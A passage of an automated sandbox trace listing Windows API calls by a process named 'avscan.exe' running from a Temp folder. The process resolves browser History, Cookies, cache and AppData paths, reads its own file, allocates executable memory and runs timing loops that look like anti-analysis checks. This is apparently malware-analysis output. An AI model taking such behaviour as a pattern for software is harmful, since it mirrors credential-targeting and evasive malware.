(in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0163.529] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Pictures\\", len=0x1c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Pictures\\") returned 1 [0163.529] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Pictures\\", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\pictures\\") returned 0x1c [0163.529] SysReAllocStringLen (in: pbstr=0x28fd58*="C:\\Users\\kEecfMwgj\\Pictures\\", psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x28fd58*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0163.529] SysReAllocStringLen (in: pbstr=0x2ad25d0*=0x0, psz="c:\\users\\keecfmwgj\\pictures\\", len=0x1c | out: pbstr=0x2ad25d0*="c:\\users\\keecfmwgj\\pictures\\") returned 1 [0163.529] SHGetFolderPathW (in: hwnd=0x0, csidl=34, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 0x0 [0163.532] SysReAllocStringLen (in: pbstr=0x28fd48*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History", len=0x3a | out: pbstr=0x28fd48*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History") returned 1 [0163.533] SysReAllocStringLen (in: pbstr=0x28fd4c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0163.533] GetThreadLocale () returned 0x409 [0163.533] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.533] GetThreadLocale () returned 0x409 [0163.533] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.533] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", lpFilePart=0x28fa90*=0x0) returned 0x3b [0163.533] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0163.533] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", len=0x3b | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\") returned 1 [0163.533] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", cchLength=0x3b | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 0x3b [0163.534] SysReAllocStringLen (in: pbstr=0x28fd4c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x28fd4c*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0163.534] SysReAllocStringLen (in: pbstr=0x2ad25d4*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\", len=0x3b | out: pbstr=0x2ad25d4*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\") returned 1 [0163.534] SHGetFolderPathW (in: hwnd=0x0, csidl=33, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 0x0 [0163.541] SysReAllocStringLen (in: pbstr=0x28fd3c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies", len=0x3c | out: pbstr=0x28fd3c*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies") returned 1 [0163.541] SysReAllocStringLen (in: pbstr=0x28fd40*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0163.541] GetThreadLocale () returned 0x409 [0163.541] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.542] GetThreadLocale () returned 0x409 [0163.542] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.542] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpFilePart=0x28fa90*=0x0) returned 0x3d [0163.542] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0163.542] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", len=0x3d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 1 [0163.542] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", cchLength=0x3d | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 0x3d [0163.542] SysReAllocStringLen (in: pbstr=0x28fd40*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x28fd40*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0163.542] SysReAllocStringLen (in: pbstr=0x2ad25d8*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\", len=0x3d | out: pbstr=0x2ad25d8*="c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\") returned 1 [0163.542] SHGetFolderPathW (in: hwnd=0x0, csidl=32, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 0x0 [0163.545] SysReAllocStringLen (in: pbstr=0x28fd30*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files", len=0x4b | out: pbstr=0x28fd30*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0163.545] SysReAllocStringLen (in: pbstr=0x28fd34*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0163.546] GetThreadLocale () returned 0x409 [0163.546] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.546] GetThreadLocale () returned 0x409 [0163.546] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.546] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", lpFilePart=0x28fa90*=0x0) returned 0x4c [0163.546] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0163.546] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", len=0x4c | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\") returned 1 [0163.546] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", cchLength=0x4c | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 0x4c [0163.546] SysReAllocStringLen (in: pbstr=0x28fd34*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x28fd34*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0163.547] SysReAllocStringLen (in: pbstr=0x2ad25dc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\", len=0x4c | out: pbstr=0x2ad25dc*="c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\") returned 1 [0163.547] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x2ae1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0163.550] SysReAllocStringLen (in: pbstr=0x28fd24*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming", len=0x22 | out: pbstr=0x28fd24*="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 1 [0163.550] SysReAllocStringLen (in: pbstr=0x28fd28*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0163.550] GetThreadLocale () returned 0x409 [0163.550] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0163.550] GetThreadLocale () returned 0x409 [0163.550] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0163.561] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", lpFilePart=0x28fa90*=0x0) returned 0x23 [0163.561] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0163.561] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", len=0x23 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\") returned 1 [0163.561] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", cchLength=0x23 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 0x23 [0163.562] SysReAllocStringLen (in: pbstr=0x28fd28*="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\", psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x28fd28*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0163.562] SysReAllocStringLen (in: pbstr=0x2ad25e0*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\roaming\\", len=0x23 | out: pbstr=0x2ad25e0*="c:\\users\\keecfmwgj\\appdata\\roaming\\") returned 1 [0163.562] VirtualFree (lpAddress=0x2ae4000, dwSize=0x14000, dwFreeType=0x4000) returned 1 [0163.564] GetVersion () returned 0x1db10106 [0163.564] GetCurrentProcessId () returned 0xbac [0163.564] GetCurrentProcess () returned 0xffffffff [0163.564] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0163.564] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0163.564] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0163.564] GetCommandLineW () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0163.565] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0163.565] RtlDosPathNameToNtPathName_U (in: DosPathName="c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", NtPathName=0x28fcd8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0163.565] NtCreateFile (in: FileHandle=0x28fce8, DesiredAccess=0x80100080, ObjectAttributes=0x28fcbc*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x28fce0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x1, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x28fce8*=0xfc, IoStatusBlock=0x28fce0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0163.566] RtlFreeAnsiString (AnsiString="\\") [0163.566] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0163.571] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fef0, BufferLength=0x40, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fef0*) returned 0x0 [0163.683] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0163.684] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fedc, BufferLength=0x14, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fedc*) returned 0x0 [0163.684] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0163.684] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdfc, BufferLength=0xe0, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdfc*) returned 0x0 [0163.684] NtSetInformationFile (FileHandle=0xfc, IoStatusBlock=0x28fce4, FileInformation=0x28fcdc, Length=0x8, FileInformationClass=0xe) returned 0x0 [0163.684] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0163.684] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0163.684] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0163.685] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0163.685] NtReadFile (in: FileHandle=0xfc, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x28fce0, Buffer=0x28fdd4, BufferLength=0x28, ByteOffset=0x0, Key=0x0 | out: IoStatusBlock=0x28fce0, Buffer=0x28fdd4*) returned 0x0 [0163.685] NtClose (Handle=0xfc) returned 0x0 [0163.689] GetLastError () returned 0x0 [0163.689] SetLastError (dwErrCode=0x0) [0163.689] GetLastError () returned 0x0 [0163.689] SetLastError (dwErrCode=0x0) [0163.689] GetLastError () returned 0x0 [0163.690] SetLastError (dwErrCode=0x0) [0163.690] GetLastError () returned 0x0 [0163.690] SetLastError (dwErrCode=0x0) [0163.727] GetCurrentThreadId () returned 0xba4 [0163.728] VirtualAlloc (lpAddress=0x2ae4000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x40) returned 0x2ae4000 [0163.734] GetTickCount () returned 0x1d0fb67 [0163.734] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064456282604) returned 1 [0163.735] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064456297507) returned 1 [0163.735] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064456309046) returned 1 [0163.735] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064456326081) returned 1 [0163.735] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064456342738) returned 1 [0163.735] Sleep (dwMilliseconds=0x0) [0163.780] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064460893686) returned 1 [0163.781] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064460911258) returned 1 [0163.781] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064460926892) returned 1 [0163.781] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064460943250) returned 1 [0163.781] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064460957203) returned 1 [0163.781] Sleep (dwMilliseconds=0x0) [0163.825] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465385953) returned 1 [0163.826] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465400891) returned 1 [0163.826] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465414662) returned 1 [0163.826] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465428136) returned 1 [0163.826] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465443556) returned 1 [0163.826] Sleep (dwMilliseconds=0x0) [0163.827] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465553137) returned 1 [0163.827] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465567695) returned 1 [0163.827] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465580430) returned 1 [0163.827] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465596335) returned 1 [0163.828] QueryPerformanceCounter (in: lpPerformanceCount=0x28fea8 | out: lpPerformanceCount=0x28fea8*=3064465609308) returned 1 [0163.828] Sleep (dwMilliseconds=0x0) [0163.828] GetTickCount () returned 0x1d0fbc5 [0163.828] VirtualFree (lpAddress=0x2b04000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0163.830] GetLastError () returned 0x0 [0163.830] SetLastError (dwErrCode=0x0) [0163.830] GetLastError () returned 0x0 [0163.831] SetLastError (dwErrCode=0x0) [0163.831] GetLastError () returned 0x0 [0163.831] SetLastError (dwErrCode=0x0) [0163.831] GetLastError () returned 0x0 [0163.845] SetLastError (dwErrCode=0x0) [0163.845] GetLastError () returned 0x0 [0163.845] SetLastError (dwErrCode=0x0) [0163.845] GetLastError () returned 0x0 [0163.846] SetLastError (dwErrCode=0x0) [0163.846] GetLastError () returned 0x0 [0163.846] SetLastError (dwErrCode=0x0) [0163.846] GetLastError () returned 0x0 [0163.846] SetLastError (dwErrCode=0x0) [0163.846] GetLastError () returned 0x0 [0163.847] SetLastError (dwErrCode=0x0) [0163.847] GetLastError () returned 0x0 [0163.851] SetLastError (dwErrCode=0x0) [0163.851] GetLastError () returned 0x0 [0163.852] SetLastError (dwErrCode=0x0) [0163.852] GetLastError () returned 0x0 [0163.852] SetLastError (dwErrCode=0x0) [0163.852] GetLastError () returned 0x0 [0163.852] SetLastError (dwErrCode=0x0) [0163.852] GetLastError () returned 0x0 [0163.852] SetLastError (dwErrCode=0x0) [0163.852] GetLastError () returned 0x0 [0163.853] SetLastError (dwErrCode=0x0) [0163.853] GetLastError () returned 0x0 [0163.853] SetLastError (dwErrCode=0x0) [0163.853] GetLastError () returned 0x0 [0163.853] SetLastError (dwErrCode=0x0) [0163.853] GetLastError () returned 0x0 [0163.853] SetLastError (dwErrCode=0x0) [0163.854] GetLastError () returned 0x0 [0163.854] SetLastError (dwErrCode=0x0) [0163.854] GetLastError () returned 0x0 [0163.854] SetLastError (dwErrCode=0x0) [0163.854] GetLastError () returned 0x0 [0163.854] SetLastError (dwErrCode=0x0) [0163.854] GetLastError () returned 0x0 [0163.855] SetLastError (dwErrCode=0x0) [0163.855] GetLastError () returned 0x0 [0163.855] SetLastError (dwErrCode=0x0) [0163.856] GetLastError () returned 0x0 [0163.856] SetLastError (dwErrCode=0x0) [0163.856] GetLastError () returned 0x0 [0163.856] SetLastError (dwErrCode=0x0) [0163.857] GetLastError () returned 0x0 [0163.857] SetLastError (dwErrCode=0x0) [0163.858] GetLastError () returned 0x0 [0163.858] SetLastError (dwErrCode=0x0) [0163.858] GetLastError () returned 0x0 [0163.858] SetLastError (dwErrCode=0x0) [0163.858] GetLastError () returned 0x0 [0163.859] SetLastError (dwErrCode=0x0) [0163.859] GetLastError () returned 0x0 [0163.859] SetLastError (dwErrCode=0x0) [0163.859] GetLastError () returned 0x0 [0163.859] SetLastError (dwErrCode=0x0) [0163.859] GetLastError () returned 0x0 [0163.859] SetLastError (dwErrCode=0x0) [0163.860] GetLastError () returned 0x0 [0163.860] SetLastError (dwErrCode=0x0) [0163.860] GetLastError () returned 0x0 [0163.860] SetLastError (dwErrCode=0x0) [0163.860] VirtualAlloc (lpAddress=0x2b04000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2b04000 [0163.861] GetLastError () returned 0x0 [0163.861] SetLastError (dwErrCode=0x0) [0163.861] GetLastError () returned 0x0 [0163.861] SetLastError (dwErrCode=0x0) [0163.861] GetLastError () returned 0x0 [0163.861] SetLastError (dwErrCode=0x0) [0163.861] GetLastError () returned 0x0 [0163.862] SetLastError (dwErrCode=0x0) [0163.862] GetLastError () returned 0x0 [0163.862] SetLastError (dwErrCode=0x0) [0163.862] GetLastError () returned 0x0 [0163.862] SetLastError (dwErrCode=0x0) [0163.862] GetLastError () returned 0x0 [0163.870] SetLastError (dwErrCode=0x0) [0163.873] LoadStringA (in: hInstance=0x42d000, uID=0xffdf, lpBuffer=0x28f504, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0163.874] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0163.875] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0163.875] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0163.876] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0163.876] RtlUnwind (TargetFrame=0x28fedc, TargetIp=0x430828, ExceptionRecord=0x28fa28, ReturnValue=0x0) [0163.876] GetLastError () returned 0x0 [0163.877] SetLastError (dwErrCode=0x0) [0163.877] GetLastError () returned 0x0 [0163.877] SetLastError (dwErrCode=0x0) [0163.877] GetLastError () returned 0x0 [0163.877] SetLastError (dwErrCode=0x0) [0163.877] GetLastError () returned 0x0 [0163.877] SetLastError (dwErrCode=0x0) [0163.878] GetLastError () returned 0x0 [0163.878] SetLastError (dwErrCode=0x0) [0163.878] GetLastError () returned 0x0 [0163.900] SetLastError (dwErrCode=0x0) [0163.900] GetLastError () returned 0x0 [0163.900] SetLastError (dwErrCode=0x0) [0163.900] GetLastError () returned 0x0 [0163.901] SetLastError (dwErrCode=0x0) [0163.901] GetLastError () returned 0x0 [0163.901] SetLastError (dwErrCode=0x0) [0163.901] GetLastError () returned 0x0 [0163.901] SetLastError (dwErrCode=0x0) [0163.901] GetLastError () returned 0x0 [0163.901] SetLastError (dwErrCode=0x0) [0163.902] GetLastError () returned 0x0 [0163.902] SetLastError (dwErrCode=0x0) [0163.902] GetLastError () returned 0x0 [0163.902] SetLastError (dwErrCode=0x0) [0163.904] GetLastError () returned 0x0 [0163.904] SetLastError (dwErrCode=0x0) [0163.904] GetLastError () returned 0x0 [0163.904] SetLastError (dwErrCode=0x0) [0163.905] GetLastError () returned 0x0 [0163.905] SetLastError (dwErrCode=0x0) [0163.905] GetLastError () returned 0x0 [0163.905] SetLastError (dwErrCode=0x0) [0163.905] GetLastError () returned 0x0 [0163.905] SetLastError (dwErrCode=0x0) [0163.906] GetLastError () returned 0x0 [0163.906] SetLastError (dwErrCode=0x0) [0163.906] GetLastError () returned 0x0 [0163.906] SetLastError (dwErrCode=0x0) [0163.906] GetLastError () returned 0x0 [0163.906] SetLastError (dwErrCode=0x0) [0163.906] GetLastError () returned 0x0 [0163.907] SetLastError (dwErrCode=0x0) [0163.907] GetLastError () returned 0x0 [0163.907] SetLastError (dwErrCode=0x0) [0163.907] GetLastError () returned 0x0 [0163.908] SetLastError (dwErrCode=0x0) [0163.908] GetLastError () returned 0x0 [0163.908] SetLastError (dwErrCode=0x0) [0163.908] GetLastError () returned 0x0 [0163.908] SetLastError (dwErrCode=0x0) 